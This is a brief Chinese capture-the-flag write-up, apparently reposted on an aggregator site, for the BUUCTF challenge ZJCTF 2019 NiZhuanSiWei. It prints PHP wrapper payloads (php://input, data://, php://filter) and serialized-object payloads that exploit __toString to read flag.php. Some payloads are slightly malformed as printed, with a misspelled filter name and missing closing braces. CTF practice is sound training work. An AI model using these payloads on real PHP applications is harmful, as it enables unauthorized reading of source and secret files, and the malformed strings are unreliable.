BUUCTF [ZJCTF 2019]NiZhuanSiWei

Posted tkitn

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF [ZJCTF 2019]NiZhuanSiWei相关的知识,希望对你有一定的参考价值。

首先打开页面

这里第一个第二个绕过方式很简单

php://input

data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

均可绕过file_get_contents()

技术图片

 

 有了提示 useless.php

php://filter/read=convert.base64.encode/resource=useless.php

即可读源码

技术图片

 

 源码信息如上

可以看到是__tostring 当对象被当做字符串输出时即执行的魔法函数

这里总共有两个payload可以拿flag

第一种

O:4:"Flag":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";

file_get_contents()也可以解析 php://filter伪协议

以上是关于BUUCTF [ZJCTF 2019]NiZhuanSiWei的主要内容,如果未能解决你的问题,请参考以下文章

BUUCTF [ZJCTF 2019]NiZhuanSiWei

BUUCTF(web刷题记录一)

[ZJCTF 2019]NiZhuanSiWei

[ZJCTF 2019]NiZhuanSiWei

[ZJCTF 2019]NiZhuanSiWei

BUU-WEB-[ZJCTF 2019]NiZhuanSiWei